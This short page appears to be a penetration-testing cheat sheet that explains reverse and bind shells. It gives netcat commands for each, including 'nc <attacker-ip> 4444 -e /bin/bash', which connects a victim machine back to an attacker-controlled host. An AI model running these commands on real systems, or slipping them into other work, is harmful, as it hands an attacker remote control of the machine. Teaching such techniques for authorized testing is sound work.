Shells

Shells#

Reverse Shell#

A victim (target) connects back to the attacker (attackbox is listening). This is the most commonly used pattern.

  • Attacker:


nc -nlvp 4444

  • Victim:


nc <attacker-ip> 4444 -e /bin/bash

Bind Shell#

The victim opens a listening port and the attacker connects to it. Useful for external tests when the attacker’s IP may vary or when port forwarding isn’t available.

  • Victim:

nc -nvlp 4444 -e /bin/bash
  • Attacker:

nc <victim-ip> 4444